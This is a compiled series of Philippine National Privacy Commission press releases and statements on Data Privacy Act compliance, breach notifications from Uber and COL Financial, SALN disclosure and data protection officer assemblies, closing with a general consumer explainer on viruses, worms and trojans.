The DOH Dengvaxia master list has recently been the subject of access requests coming from the Public Attorney’s Office (PAO), some private organizations, and members of the media. The information contained in the list is considered sensitive personal information, and relates to minors, whom the NPC identifies as a vulnerable group of data subjects.
In the advisory opinion, Liboro said personal data provided to government or public authorities may be processed without consent when it is done pursuant to the particular agency’s constitutional or statutory mandate, and subject to the requirements of the Data Privacy Act of 2012 (DPA).
In the case of the request by the PAO to obtain the DOH master list, this general rule does not apply. The agency, however, may be allowed access to the data of the specific victims it represents as their duly authorized legal counsel.
“Should the PAO be authorized as the legal representative of the minor data subjects, they may then be provided information on the particular data subject they are representing, subject to the presentation of proof of such authorization,” Liboro said.
As to the request of media and other private organizations, Liboro said the disclosure of statistical or aggregated data, without any personal or sensitive personal information, should suffice. Otherwise, the release of a copy of the master list in its raw version would be tantamount to an unwarranted invasion of personal privacy.
# # #
-
NPC sets March deadline for submission of 2017 Annual Security Incident Report of personal information controllers
PRESS RELEASE
1. Personal Information Controllers (PICs) in the country may begin submitting their 2017 Annual Security Incident Report to the National Privacy Commission (NPC), from January 3 to March 31, 2018.
2. The law requires all PICs to submit an Annual Security Incident Report, even if the PIC concerned does not need to register with the NPC. The Annual Security Incident Report contains information on the security incidents that affect personal data under a PIC’s control, including the number of security incidents that affect personal data in each calendar year.
3. Under the various circulars of the NPC, PICs must document adverse events that have an impact on the availability, integrity, or confidentiality of personal data, even if these adverse events prove unsuccessful. These events are defined in Philippine data privacy laws as security incidents:
SECTION 3. Definition of Terms. For the purpose of this Circular, the following terms are defined, as follows:
xxx
J. “Security incident” is an event or occurrence that affects or tends to affect data protection, or may compromise the availability, integrity, and confidentiality of personal data. It shall include incidents that would result to a personal data breach, if not for safeguards that have been put in place.
a. It goes without saying that data breaches that must be reported within 72 hours to the NPC and to the affected data subjects must be included in the Annual Security Incident Report.
b. Where a brute force attack on a database containing personal information was stopped by a timely intervention on the part of the PIC's information security team, that event should also be included in the Annual Security Incident Report.
c. With more reason, an unauthorized alteration in a database that alters the personal records of an individual, to that individual’s detriment, must be included in the Annual Security Incident Report.
d. Also, a cyberattack that successfully uncovers industrial secrets that do not involve the processing of personal data may be considered a security incident under Philippine data privacy law, and as such, needs to be included in the Annual Security Incident Report.
4. Privacy Commissioner and Chairman Raymund Enriquez Liboro today said the window is meant to give PICs ample time to prepare a complete report. “We want to give PICs ample opportunity to audit their privacy program and improve their organization’s efficiency in the way they manage their security incidents. These reports are an essential signpost of any PIC’s commitment to protecting the personal data of its customers and employees. I encourage the PICs concerned to check the NPC website for further guidance,” Liboro said.
5. "When properly collated, the data becomes an invaluable management resource that enables a PIC to assess its reaction time for every crucial event. From the moment an incident occurred to its discovery, and to the time it took for the internal breach response team to properly diagnose the situation, decide on an action, deploy contingency measures and notify the NPC if necessary. The PIC must find ways to reduce time lags whenever possible. It amounts to mitigating potential harm to data subjects," he added.
6. To submit the 2017 annual report, a PIC may send the document on or before the deadline via email to [email protected].
7. Under Philippine data privacy laws, a PIC is a person or organization (including all public and private entities) who controls the collection, holding, processing or use of personal information. The term also includes a person or organization who instructs another person or organization to collect, hold, process, use, transfer or disclose personal information on his or her behalf.
*Updated on 1 February 2018; originally published on 4 January 2018
# # #
-
NPC launches PH-wide data protection drive for LGUs in Region 11
DAVAO CITY, Philippines - The National Privacy Commission (NPC) recently launched its nationwide campaign here on how local government units (LGUs) can start their journey to compliance and reap the benefits of the Data Privacy Act of 2012.
Speaking to Davao Region LGU chief executives and representatives on Monday last week at DPO11: The LGU Data Protection Officers’ Assembly, Privacy Commissioner and Chairman Raymund Enriquez Liboro underscored the importance of systematic compliance, saying it will foster greater trust in the way local governments work among business executives and the general public. This will also allow citizens to enjoy the benefits of local government projects like the Listahanan and other initiatives, worry-free and in a secure manner.
"Filipinos experience government service on a more personal level when they avail of social services offered at city and town halls. If LGUs in the region would rigorously enforce data privacy safeguards in their daily operations, not only will it usher in better local government administration and enhanced social services. It will also redound to improved business practices and usher in the region's readiness to absorb the economic benefits of the emerging knowledge economy," Liboro told the event participants.
Local chief executives and representatives from as far as Compostela Valley, Sarangani, San Isidro, Buhangin, and Tagum City were among those who gathered at the Marco Polo Davao hotel on Claro M. Recto street in Davao City for the whole-day event, which is the first in a series of assemblies to be organized by the NPC for LGUs.
To aid Davao government DPOs in quickly building their capability in facilitating the compliance of their respective offices, the NPC has provided them with the second edition of the NPC Privacy Toolkit. Designed to help new DPOs progressively build their competence and confidence on the job, the toolkit serves as a practical reference for day-to-day use.
In her written message of support for the summit, Davao City Mayor Sara Z. Duterte commended the NPC and the Region 11 office of the Department of Interior and Local Government (DILG), which helped set up the event, expressing her hope that the campaign for data privacy protection would promote not just innovation and growth but also national security.
“Local governments are entrusted with millions of personal data information, and so we have to ensure that we have written data privacy policies governing personal information controllers on what to do and how to secure the data that is entrusted to them. At the same time, it is also vital that clients are made aware of their rights and responsibilities over the information they release,” part of Mayor Duterte’s message reads.
The DPO11 assembly is intended to meet the particular needs of government DPOs in a local government setting, beginning with Region 11. It is the eleventh in a series of DPO assemblies organized by the NPC on a sectoral basis, tailor-fitting compliance to meet varying data protection issues across sectors and industries.
-
Latest Statement of Privacy Commissioner Raymund Enriquez Liboro on the Uber Personal Data Breach
- Today, Uber made public additional information earlier made available to us on their 2016 data breach. We were informed that around 171,000 Filipino citizens consisting of drivers and passengers were affected by the breach. We understand this to be based on the mobile phone numbers included in the registry. We were also informed that the exposure of the affected data subjects was limited to their registered name, e-mail address, and phone number.
- We are looking now at the processes and procedures that Uber claims they have taken to ensure that this matter never happens again. We are paying particular attention to the steps taken to ensure that in the future, data breaches of this magnitude will not be concealed from regulators and from affected data subjects.
- In line with this, we have summoned them to appear before the Commission to further explain their data processing operations particularly the organizational, technical and physical security measures Uber Philippines is implementing to protect Filipino drivers and riders.
- We remind the public that the concealment of data breaches that involve sensitive personal information or data is a criminal offense.
- We have received reports of irregular processing following the report of the breach, but we are still investigating these claims and their link to the 2016 data breach incident. As usual, we expect full cooperation from Uber on these matters.
-
PH Strengthens Extraterritorial Reach through the APEC Cross Border Privacy Enforcement Arrangement
1. The Philippines has joined the APEC Cross Border Privacy Enforcement Arrangement (CPEA), the government backstop enforcement network developed for the Cross-Border Privacy Rules (CBPR). The CPEA facilitates information sharing among privacy enforcement authorities in APEC economies, provides mechanisms to promote effective cross-border privacy cooperation, and encourages information sharing and cooperation with authorities outside APEC.
2. Administrators of the CPEA on Thursday confirmed the NPC’s status as a Privacy Enforcement Authority (PEA) for the Philippines. The NPC becomes the eleventh PEA, joining those from eight other APEC economies, namely Australia, Canada, Hong Kong, Japan, the Republic of Korea, New Zealand, the US, and Mexico.
3. Privacy Commissioner and Chairman Raymund Enriquez Liboro on Tuesday said that as a next step, the NPC is convening local stakeholders to build consensus around formally joining the APEC CBPR.
4. Dubbed the APEC CBPR Manila Workshop, the two-day workshop was held at the Sofitel Philippine Plaza Manila with the theme "Making the APEC Cross-Border Privacy Rules Scalable." It was jointly organized by the NPC and the US Department of Commerce, with participation by the Federal Trade Commission.
5. “The CBPR System enables Philippine-based companies to get their data-privacy and protection systems certified with a local Accountability Agent. This would allow them to freely transfer data to all CBPR-participating countries. For businesses, this would mean less hassle as certification would amount to meeting the privacy requirements of each member-country in the system,” Liboro said.
6. To date, five APEC economies are already part of the CBPRs, namely South Korea, Canada, Japan, Mexico and the United States.
7. The APEC CBPR system is a regional, multilateral cross-border data transfer mechanism and enforceable privacy code of conduct developed for businesses by the 21 APEC member economies. The CBPRs implement the nine high-level APEC Privacy Framework principles.
8. Although all APEC economies have endorsed the system, participation requires individual APEC economies to officially express their intent to join, adhere to a set of common principles, and show that an effective enforcement mechanism is in place.
-
Statement of Privacy Commissioner Raymund Enriquez Liboro on the Uber Personal Data Breach
Press Statement
28/11/2017
1. Yesterday, Uber wrote to us in compliance with their commitment to provide more detailed information about their data breach of October 2016.
2. In that letter, Uber confirmed to us that personal information of Filipinos was exposed in the data breach. As such, the National Privacy Commission has jurisdiction over the data breach insofar as it affects these Filipino citizens.
3. Unfortunately, Uber failed to provide the level of detail that we expect from personal information controllers about data breach notifications, such as the actual number of Filipinos affected, and the scope of their exposure. However, they declared the following:
- Two individuals outside Uber inappropriately accessed user data stored on a third-party cloud-based service that Uber uses.
- The two Uber employees who led the response to the data breach are no longer with Uber.
- The compromised data includes the names and driver’s licenses of around 600,000 drivers in the United States and some personal information of 57 million Uber users around the world. The information included names, email addresses and mobile phone numbers.
- The incident did not breach Uber’s corporate systems; there is no indication that trip location history, credit card numbers, bank account numbers, or dates of birth were downloaded.
- Filipino data subjects are affected, but there is no indication that any Filipino driver's licenses were downloaded.
- Uber has implemented security measures to restrict access to and strengthen controls on their cloud-based storage accounts.
4. Under the principle of accountability, we require personal information controllers within our jurisdiction to provide detailed information on the nature of the incident, the scope of the exposure, and the remedial measures taken.
5. While Uber has repeatedly asserted that there has been no evidence of fraud or misuse tied to the incident, the concealment of a data breach bears serious consequences under the Data Privacy Act of 2012.
6. If so qualified, those responsible for the concealment of the breach and for the exfiltration of the data may face serious civil and criminal liability.
7. We appreciate the continued participation and cooperation of Uber in this investigation. On their own initiative, Uber has placed an information page available within the Accounts and Payment Options menu within the Help section of the Uber app. Filipino data subjects may avail of this feature.
8. The investigation continues. We are also cooperating with the data privacy authorities of Australia and the United States on this matter.
9. We are not here to merely prosecute offenses against data privacy, but to work with all stakeholders to ensure that we keep moving toward a safer data ecosystem where data flows freely and securely.
-
Statement of Privacy Commissioner Raymund Enriquez Liboro on NPC's November 23 meeting with Uber PH
Press Statement
24/11/2017
1. The National Privacy Commission summoned Uber to a meeting on Thursday, November 23, 5:30 PM to discuss the self-reported breach that was admitted by the CEO of the transport network vehicle service company.
2. Uber came to the meeting represented by its Data Protection Officer, Atty. Yves Gonzalez, accompanied by external counsel.
3. Unfortunately, Uber failed to provide the Commission with vital information at the meeting, especially on whether Filipino data are involved, citing limited information from their US Office.
4. We cannot rule out at this time that any Filipino data was compromised.
5. Uber committed to respond in detail to the Commission’s queries about the nature of the breach, what data was involved, and what measures were applied to address the breach, as soon as confirmed data becomes available.
6. The Commission has set a 48-hour deadline for Uber to provide vital information about the breach.
7. The NPC has reminded Uber that the concealment of a data breach that involves sensitive personal information or information that, under the circumstances, can be used to enable identity fraud, is a criminal offense punishable under the Data Privacy Act of 2012.
8. The NPC has tapped its network of privacy regulators, particularly the Federal Trade Commission of the US, to share information on this incident.
-
Statement of Privacy Commissioner Raymund Enriquez Liboro on the personal data breach sustained by Uber in 2016
Late last night, Uber Chief Executive Officer Dara Khosrowshahi issued a statement to the public announcing that personal data of around 50 million Uber users and 7 million Uber drivers was compromised in a security incident dating back to October 2016, and that Uber had concealed the fact of this security incident.
The National Privacy Commission (NPC) is concerned about the possible impact of the breach on our citizens. By virtue of its operations and processing of Filipino end user data, Uber is considered a Personal Information Controller and must comply with Philippine data privacy and protection laws.
To this end, we have summoned Uber to a meeting on November 23, 2017 to shed more light on the incident and to comply with the formal breach notification procedure as provided by the Data Privacy Act of 2012 (Republic Act No. 10173). This includes providing the NPC with detailed information on the nature of the breach, the personal data of Filipinos possibly involved, and the measures taken by Uber to address the breach.
We will release vital information to the public as it becomes available.
-
Statement of the Privacy Commissioner Raymund Enriquez Liboro on the possible personal data breach sustained by COL Financial Group, Inc.
The National Privacy Commission received a notification at 3:30 in the afternoon of Friday, October 20, 2017, from COL Financial Group, Inc. of a potential data breach in its system.
We note that this notification has adhered to standard breach reporting protocols set forth in NPC Circular 16-03, on Personal Data Breach Management.
In the notification, the company said that "sometime in the afternoon of 17 October 2017" it detected "a possible breach" in its system that "may involve some personal client information".
The company has assured the NPC that it has taken immediate measures to address the incident, creating a response team to look into the "likelihood of the threat and probable extent of a data breach, if any."
Attached to the notification is a preliminary report giving additional details of what its breach response team has done as of Friday. The company said it ran an initial vulnerability scan of its website, the result of which was "favorable". It also mentioned the company hiring a third party group to perform an independent security and vulnerability check of the system.
At present, COL Financial has been upfront and transparent in handling this incident. This includes notification to the NPC and the affected data subjects within 72 hours of knowledge or reasonable belief that a breach has occurred.
The Commission expects to receive from COL Financial a full report on the incident within five days. This will help us investigate the incident more accurately and decide on our further course of action.
We are assuring the public, especially the clients of COL Financial Group, Inc., that the NPC is monitoring this incident and shall be issuing new information to all concerned as soon as it becomes available.
-
NPC Statement on SALN and Data Privacy
Privacy Commissioner and Chairman Raymund Enriquez Liboro is issuing the following statement related to the Data Privacy and SALN redaction issue:
- The Data Privacy Act (DPA) is not designed to prevent access to personal information under any circumstances. Rather, it promotes responsible and lawful use of personal information. Section 11 of the DPA states:
“The processing of personal information shall be allowed, subject to compliance with the requirements of this Act and other laws allowing disclosure of information to the public and adherence to the principles of transparency, legitimate purpose and proportionality.”
- The DPA is not meant to serve as subterfuge for preventing the processing and/or disclosure of personal information sanctioned under law.
- Based on the foregoing, the first two questions that must be addressed are: a) What is the legal basis for the SALN? and b) What does that legal basis call for?
Section 8 of RA 6713 (Code of Conduct and Ethical Standards for Public Officers and Employees) states:
“Public officials and employees have an obligation to accomplish and submit declarations under oath of, and the public has the right to know, their assets, liabilities, net worth and financial and business interests including those of their spouses and of unmarried children under eighteen (18) years of age living in their households.
These information include: a) real property, its improvements, acquisition costs, assessed value and current fair market value; b) personal property and acquisition cost; c) all other assets such as investments, cash on hand or in banks, stocks, bonds, and the like; d) liabilities, and; e) all business interests and financial connections.
The SALN must also identify and disclose a public official’s relatives in the Government in the form, manner and frequency prescribed by the Civil Service Commission.”
The SALN is mandated by RA 6713 to be publicly available, and the public’s right to know is guaranteed under this law. Information required by RA 6713 pertaining to assets, liabilities and net worth, as well as the financial and business interests of the spouse and unmarried children under 18, cannot be redacted. Other personal information should be disclosed only when necessary for a legitimate purpose.
- The next question that should be asked is whether the current SALN specifically asks for the information required under RA 6713. The current SALN reflects the enumeration stated above, while the only additional information required are the identities, date of birth, and ages of all the declarant’s children aged below 18 and residing in his/her household.
An argument can be made that an exhaustive list is not specifically required under RA 6713 except for those children who have specific business interests. However, due consideration must be made on the objectives of Section 8 of RA 6713, in that it serves as a lifestyle check measure on government officials, as well as the purpose envisioned by the Civil Service Commission (CSC) in enforcing the law.
Any information that may not be explicitly required by RA 6713 to be reflected in the SALN should be assessed for its proportionality and necessity to the purposes and objectives contemplated by said law.
- Hereon, the CSC may review the fields of the current SALN to ensure that it contains information sanctioned by RA 6713 and other applicable laws. Personal information outside this purview should be subjected to the requirements found in the Data Privacy Act specifically applying the principle of proportionality in determining whether to include certain fields of personal data in the current SALN form, such as names of minor children and the specific residential address of the filer, when disclosing the forms to the public.
Overall, the country is still taking baby steps when it comes to implementing the Data Privacy Act and the FOI EO. Fully grasping its mechanisms would take a little time and will not happen overnight. What is important is that our citizens, especially those in the media sector, are engaged and that the government remains steadfast in viewing both privacy and transparency as important values to every Filipino.
About the NPC: The National Privacy Commission is a regulatory and quasi-judicial body organized by virtue of RA 10173, otherwise known as the Data Privacy Act of 2012. The agency is mandated to uphold the right to data privacy and ensure the free flow of information, with a goal of promoting economic growth and innovation.
-
Ahead of PHIE, Private Hospitals Complying with Data Privacy Act
With the upcoming implementation of the Philippine Health Information Exchange (PHIE), private hospitals have committed to comply with the Data Privacy Act (DPA) of 2012 and are implementing data protection measures in their data processing systems to protect the sensitive personal information of their patients. This was revealed at the first general assembly of Data Protection Officers (DPO) of Private Hospitals.
The event, called DPO7, is the seventh in a series of DPO sectoral assemblies organized by the Commission this year and gathered participants from private hospitals. DPO7 was co-organized in cooperation with the Private Hospitals Association of the Philippines, Incorporated (PHAPI).
The PHIE is an electronic health (eHealth) initiative of the Department of Health (DOH), the Department of Science and Technology (DOST) and the Philippine Health Insurance Corporation (PhilHealth) that would ensure accurate and timely health information exchange that can be instrumental in improving the services of these three agencies as well as the other organizations that could use the said data.
Privacy Commissioner Raymund Enriquez Liboro said: “The efficient use of electronic medical records (EMR) for eHealth has a lot of potential benefits for our citizens. It is a good example of innovation in the free flow of information that the DPA espouses. The protection of personal information has to be prioritized in such systems, as there is greater danger of data breaches with the increased number of users and processors.”
Health information is considered sensitive personal information that requires a higher level of data protection, and private hospitals agree with this. According to Dr. Rustico Jimenez of Medical Center Parañaque, PHAPI President: “Hospitals have always valued information privacy; this is one of the reasons why our industry will soon be having the Health Privacy Code, which is also in line with the Data Privacy Act of 2012. Hospitals are cleaning up their patient records to be ready for the full implementation of the Philippine Health Information Exchange (PHIE), which is currently under development.”
In November of last year, the NPC received a complaint about a hospital that did not have adequate security measures for its patient records. The NPC conducted a compliance check of the hospital and will be issuing a compliance order directing the hospital to implement measures to ensure that patient data is protected.
Penalties for violations of data privacy that involve sensitive personal information (SPI) are higher than those that involve personal information; as such, SPI needs to be accorded a higher level of protection. An example of this is unauthorized disclosure: under the DPA, the maximum fine for unauthorized disclosure of personal information is one million pesos, while if it involves SPI it is two million pesos.
Last month, the NPC announced the mandatory registration of data processing systems of hospitals, including primary care facilities, multi-specialty clinics, custodial care facilities, diagnostic or therapeutic facilities, specialized out-patient facilities and other organizations processing genetic data. The mandatory registration applies to all entities that fall under these categories, regardless of the number of employees or the number of personal records they process. The implementing rules of the Data Privacy Act state that entities that have more than 250 employees, or that process sensitive personal data of more than 1,000 individuals, are required to register their data processing systems with the NPC, beginning with the designation and registration of a DPO.
For medical research, patient information is invaluable and a significant contributor to the development of new treatment methods; the anonymization of health data may be done to protect the identities of patients in research. According to Deputy Privacy Commissioner Dr. Ivy Patdu: “We want to anonymize or de-identify health information, but we must also note that advancements in technology and the availability of volumes of data may make reidentification possible. The thrust should be towards incorporating ethics in the use of information, and focusing on accountability. We may one day also consider data donation, for patients to donate their health information to science and research upon their death, the same way organs are donated.”
About NPC: The NPC is a regulatory and quasi-judicial body constituted in March 2016 by virtue of RA 10173. As the Philippines’ data privacy and data protection watchdog, the agency is mandated to uphold the right to data privacy and ensure the free flow of information, with a view to promoting economic growth and innovation. To know more about the NPC you can visit www.privacy.gov.ph
-
NPC Orders Take-down of Prostitution Web Pages
The National Privacy Commission (NPC) has ordered the take-down of web pages that promote prostitution of Filipino citizens to local and foreign adult audiences. The adult classified advertisements sections of backpage.com and its mirror site cracker.com violated provisions of the Data Privacy Act of 2012, the Expanded Anti-Trafficking in Persons Act of 2012 and the Anti-Child Pornography Act of 2009, as well as the sites’ own Terms and Conditions. Posts in the adult classifieds sections of the aforementioned sites were determined by the NPC to be solicitations for prostitution, to constitute acts of human trafficking, and to be violations of data privacy, particularly through the use of photos without the consent of the data subjects.
The NPC take-down action was prompted by a complaint to the Commission that Facebook profile photos were being used on the illegal pages without the data subjects’ consent or knowledge.
According to Privacy Commissioner Raymund Enriquez Liboro: “The use of Facebook profile photos without consent of data subjects is a clear data privacy violation and can affect a person’s reputation negatively. This is a clear bait and switch tactic of prostitution rings in order to get customers. The NPC is here to protect people by protecting their data from unauthorized use.”
The NPC communicated with backpage.com and cracker.com, informing them of the illegal activities happening on their web pages and directing them to take down the adult section of backpage.com’s Philippine microsites. The Adult Classifieds section was taken down shortly after. “We are pleased to know that they (backpage.com) have complied with our order and we didn’t have to coordinate with foreign regulators to safeguard our citizens’ data,” NPC Chairman Liboro added.
-
NPC: Late Registrants, May Face Privacy Compliance Checks
Public and private companies that failed to beat the September 9 deadline for the registration of their data processing systems, starting with the registration of their Data Protection Officer (DPO), could face compliance checks, the National Privacy Commission (NPC) warned.
Since September 9 fell on a Saturday, a non-working day, the deadline automatically moved to the next working day, Monday, September 11, 2017.
“Failure to register may subject a company or an agency to compliance checks, compliance orders, and, depending on attendant circumstances, may be considered evidence of unauthorized processing, punishable under the Data Privacy Act,” said Chairman and Privacy Commissioner Raymund Enriquez Liboro. “For one thing, in case an organization suffers a data breach in the future, its non-registration would imply lack of due diligence, critical in defending against charges of negligence,” Liboro added.
“We will continue accepting DPO registration papers from controllers and processors even after the Monday deadline, but such will be considered ‘late registrants’ and included in the list of priority organizations for a data privacy compliance check,” said Commissioner Liboro.
A compliance check by the NPC means an organization will be subjected to a comprehensive compliance validation process based on 10 critical aspects of accountability, which the NPC has termed the Data Governance Framework. The compliance check involves interviews, operations inspection, document analysis, and pertinent activities intended to appraise the organization’s culture of privacy.
Several conglomerates have registered their DPOs with the NPC, among them companies under the Ayala Group, the SM Group of companies and the Lucio Tan Group. One of the first companies to comply with the designation and registration of a DPO was Philippine National Bank (PNB), one of the companies under the Lucio Tan Group, which submitted its registration as early as May this year. According to Roland Oscuro, DPO of PNB: “In our industry, the protection of personal data is essential in maintaining the trust of our customers, as well as improving market position. Our long-term goal is to develop a culture of privacy within our organization that we hope our employees can take home and share with their family and friends.”
Unionbank, another banking institution that has complied with the Data Privacy Act, is aware of the value of data privacy in the information-driven world. According to Henry Aguda, DPO of Unionbank: “Data privacy is the proxy for trust in the information age. Together with the appropriate information security, privacy, as an organizational mindset, paves the way for responsible innovation in both online and onsite banking services. It provides convenience with a foundation for trust. The loss of trust for a bank, or any business for that matter, can be catastrophic.”
If the NPC finds an organization wanting, Liboro said, the privacy compliance check could lead to the issuance of a Compliance Order, which requires specific actions to be performed by the company within a set period. If the organization does not follow through satisfactorily, this will trigger a formal investigation that could result in prosecution.
In an effort to give organizations ample time to comply, the Commission earlier divided the registration process into two phases and extended the deadline for the more rigorous second phase to March 8, 2018. The first phase, however, which essentially consists of DPO registration, is not subject to an extension.
“Much as we may want an extension, we are compelled by law to strictly enforce the September 9 deadline for organizations to register their data processing system, which is exactly one year following the date of effectivity of the IRR (implementing rules and regulations). We understand privacy compliance is something new and we’ve made it easier by dividing it into phases, so that phase one is just all about DPO registration. We cannot, however, be lenient about the deadline itself,” Liboro said.
Section 47 of the IRR of the Data Privacy Act of 2012 requires a personal information controller (PIC) or personal information processor (PIP) that employs 250 persons or more to register its information processing system with the NPC. Those that employ fewer than 250 persons are also required to register if their operations involve the processing of personal data that may likely pose a risk to the rights and freedoms of data subjects; the processing is not occasional; or the processing includes sensitive personal information of at least one thousand (1,000) individuals.
Privacy Commissioner Raymund Enriquez Liboro (center, standing) providing support for NPC staff collecting Data Protection Officer (DPO) registration and supporting documents on the eve of the deadline (8 September 2017) for the registration of DPOs.
-
NPC Survey: Filipinos Value Data Privacy
Speakers, organizers and participants of a Data Protection Officers' General Assembly for Media and Social Media professionals pose for a group photo. The event, called DPO6, is the sixth in a series of industry-specific seminars and workshops organized by the National Privacy Commission (NPC) aimed at improving compliance with the Philippines' data protection and data privacy regulations.
A study commissioned by the National Privacy Commission (NPC) reveals that for a great majority of Filipino adults, data privacy rights are important, and they want organizations that collect personal information to provide details on how and where the data will be used.
The National Privacy Commission revealed the information at a general assembly of Data Protection Officers (DPO) from the Media and Social Media sector. The nationwide survey conducted by the Social Weather Stations (SWS) in June of this year showed that 94% of Filipino adults wanted to know more about how the personal data they provided during transactions will be used, while 85% of Filipinos agreed that the rights of data subjects are important.
The rights of data subjects when it comes to personal data processing include the right to be informed, the right to object, the right to access, the right to correct, the right to erasure or blocking and the right to damages.
Survey data showed that Filipino adult internet usage is now at 37 percent, a 2 percent increase from last year. From this data it can be concluded that there are 37 million Filipino adult internet users, about 18 million of whom are online for at least one hour every day for various purposes. The top two activities of Filipinos online are getting news (62 percent) and sharing information online (56 percent). Other online activities include getting information on health and fitness; getting information on a sensitive health topic; looking for a job; playing online games; buying things online; studying online courses; visiting online dating sites; and creating or working on one's own blog.
The SWS survey measured public awareness of issues related to the Data Privacy Act of 2012, as well as the level of trust in public and private organizations that collect and process personal data, which the privacy law calls Personal Information Controllers (PICs).
According to Privacy Commissioner Raymund Enriquez Liboro, “Data privacy has become the proxy for trust in today’s information-driven world. It would interest you to know that among private PICs in the Philippines, Filipinos trust schools the most, with a +85 net trust rating, saying they trust schools with their private data more than they trust hospitals, banks or telcos. The biggest lesson we should learn from schools is that trust is the result of hard work, because it usually takes them several decades to earn this kind of reputation,” Liboro told journalists, editors and social media professionals during the opening program of the Data Protection Officers 6 (DPO6) Assembly. The event is the sixth in a series of DPO sectoral assemblies organized by the Commission this year and gathered participants from the media and social media community. DPO6 was co-organized with the Internet rights advocacy group the Internet Society.
According to Winthrop Yu, Chairman of the Philippine Chapter of the Internet Society: “Privacy has become a real concern in today's ICT-enabled world as companies collect and utilize a person's data, sometimes without the explicit, informed consent of the person concerned. Often this data is used in ways that the person providing the data did not foresee. It's not just about spam. The widespread collection, use, and sharing between companies of personal data can negatively affect one's financial well-being and career prospects."
Media and social media are critical to protecting personal data: inappropriately posted personal information on either platform can cause irreversible harm to data subjects. “The damage to a person’s reputation from inappropriate posts can severely affect the personal lives of data subjects. We’ve seen how incorrect and unverified posts in media outlets can go viral on social media, affecting the subjects’ lives as well as their children,” Commissioner Liboro added.
-
DPO Forum Issue #01
We’re opening the very first Philippine Privacy Awareness Week today with the launch of our Data Privacy Newsletter, featuring updates from the NPC, recaps of events and issues from the past few months, and an interview with a DPO.
Get the downloadable here.
-
DPO3: Telco DPOs show commitment to data privacy compliance in NPC assembly
The country’s leading telecommunications firms on Tuesday demonstrated their commitment to upholding data subject rights in the first gathering of Data Protection Officers (DPOs) for the sector conducted by the National Privacy Commission (NPC) at the GT-Toyota Asian Center, Katipunan Avenue, Diliman, Quezon City.
Dubbed DPO3: The Data Protection Officers’ Assembly for the Telecommunications Sector, the event explores opportunities for cooperation between government and telco firms in upgrading the data privacy and security practices in the industry. This is a crucial endeavor, as the telco industry is considered a primary mover of information and innovation in the country.
About 200 DPOs joined the half-day assembly, which aimed to help them quickly learn and assert their crucial roles within their organizations as guardians and champions of data subject rights.
Through the assembly, the NPC hopes to assist DPOs in promoting a culture of data privacy in their respective organizations, as well as to develop a robust structure for proper data breach management.
Additionally, the NPC aims to establish among the participants a sense of kinship being the pioneering batch of DPOs in the industry and enable them to consult on common concerns, collaborate on mutual projects, and share best practices.
Institutions in the telco industry play a crucial role in delivering the basic communication needs of consumers in the Philippines, and even abroad through their linkages and partnerships with foreign providers. The sector has customized its products and services to cater to its diverse subscribers, providing not just means of communication but also entertainment, recreation, and financial accommodation, among others. These represent a vast pool of personal data processed within the sector which, if not properly managed and protected, could negatively impact not just the sector itself but a large part of the Philippine economy.
DPO3 is the third in a series of assemblies organized by the NPC following the success of DPO1 last 05 April 2017, which catered to government DPOs, and DPO2 last 31 May 2017 for banks and financial institutions.
-
NPC pushes data privacy compliance in banking sector in upcoming DPO2
The National Privacy Commission (NPC) is set to convene the Data Protection Officers (DPOs) of the financial services sector on 31 May 2017. Dubbed “DPO2: The 2nd Data Protection Officers’ Assembly,” the event will be held in cooperation with the Bangko Sentral ng Pilipinas (BSP) and the Bankers Association of the Philippines (BAP). It aims to gather the data protection officers of different banks, who will perform vital duties to ensure their organizations’ compliance with the provisions of the Data Privacy Act (DPA) of 2012.
The event is expected to draw more than a hundred DPO delegates from BSP-Supervised Financial Institutions (BSFIs) at the BSP Assembly Hall A, Bangko Sentral ng Pilipinas, Mabini Street, Manila.
The BSP and the BAP earlier agreed to team up with the NPC in organizing DPO2 in order to help facilitate prompt and efficient compliance by BSFIs with the privacy law. Thus, aside from being a venue for compliance assistance, DPO2 shall function as the first step in developing a roadmap for addressing the distinct concerns of the financial sector under the DPA. The BSP, BAP and the NPC shall also explore ways of harmonizing data privacy compliance obligations under the law with existing BSP regulations already being observed by banks.
“The NPC considers banks a critical sector when it comes to protecting personal data, and so far the level of cooperation we are getting from the sector has been encouraging,” said Privacy Commissioner and Chairman Raymund E. Liboro.
“Customers trust banks not just with their hard-earned money, but also with their personal information. Trust comes with high expectations, and data protection officers within banks play an important role in maintaining this trust, and meeting customers’ expectations,” Commissioner Liboro added. He further explains, “they expect you to work hard at protecting their money and also their privacy. Violating this trust can lead to brand depreciation, revenue loss, or worse — customer exit. DPO2 is an investment in data privacy protection, and it shall go a long way not just in preserving our people’s trust in the financial system, but also in building a strong foundation for data privacy compliance in the private sector.”
DPO2 shall be the first DPO assembly to be conducted by the NPC for the private sector. Commissioner Liboro said plans are also underway to conduct similar events for the health services sector, the academe, and the business process outsourcing industry, among others.
Last April 5, the NPC conducted DPO1 for government data protection officers at the Landbank Plaza in Malate, Manila.
The NPC is a regulatory body created by virtue of RA 10173, otherwise known as the Data Privacy Act of 2012. It is an attached agency of the Department of Information and Communication Technology.
-
Threats to Security and Privacy
KNOW YOUR ENEMY — This timeless piece of advice is especially relevant today, as data privacy threats, both online and offline, have become as rampant as ever. Undetected attacks on our privacy may suddenly be leveraged to wreak havoc at any moment. While defenses and legislation struggle to catch up with fast-paced technological advancements, understanding the basic ways in which cybercriminals and other ill-willed persons can prey on unsuspecting citizens becomes increasingly important for the common Filipino.
Attacks from identity thieves, hackers, unscrupulous marketers, and other devious actors usually take on a few common forms. Familiarizing ourselves with these forms is one of the best ways through which we can arm and protect ourselves against these attacks. The most common forms are as follows:
Viruses and Worms
Viruses and worms are two of the most common forms of malicious software, or malware. Malware can infect a system without the owner’s consent and make copies of its own code that spread to other programs and computers. The effects of these small programs range from mildly annoying to critically damaging to entire databases and software. Among their many uses, one of the most dangerous ways they threaten your data privacy is by opening a backdoor through which attackers can access your passwords, IP addresses, banking information, and other personal data.
The crucial difference between the two is how they travel from one computer to another. A virus is almost always attached to an executable file, such as an .EXE or .COM file, and runs and spreads when that file is run. A worm, on the other hand, stands alone and spreads by itself, taking advantage of system vulnerabilities or of trickery.
Trojans
Trojans, named after the infamous Trojan Horse of the Ancient Greeks, are characterized by their deception. This kind of malware is designed to mislead you into downloading it onto your system and running it by disguising itself as a harmless file — perhaps as an e-mail about a promo enticing you to download the attachment to avail of a freebie or discount, or as a routine form from a bank sent by an impostor. Like viruses and worms, trojans can grant attackers access to your computer or phone, steal your personal information, or download even more malware. The best defense against this kind of threat, aside from installing anti-virus software and setting up firewalls, is to be wary of opening attachments in e-mails sent to you or clicking on pop-ups from websites.
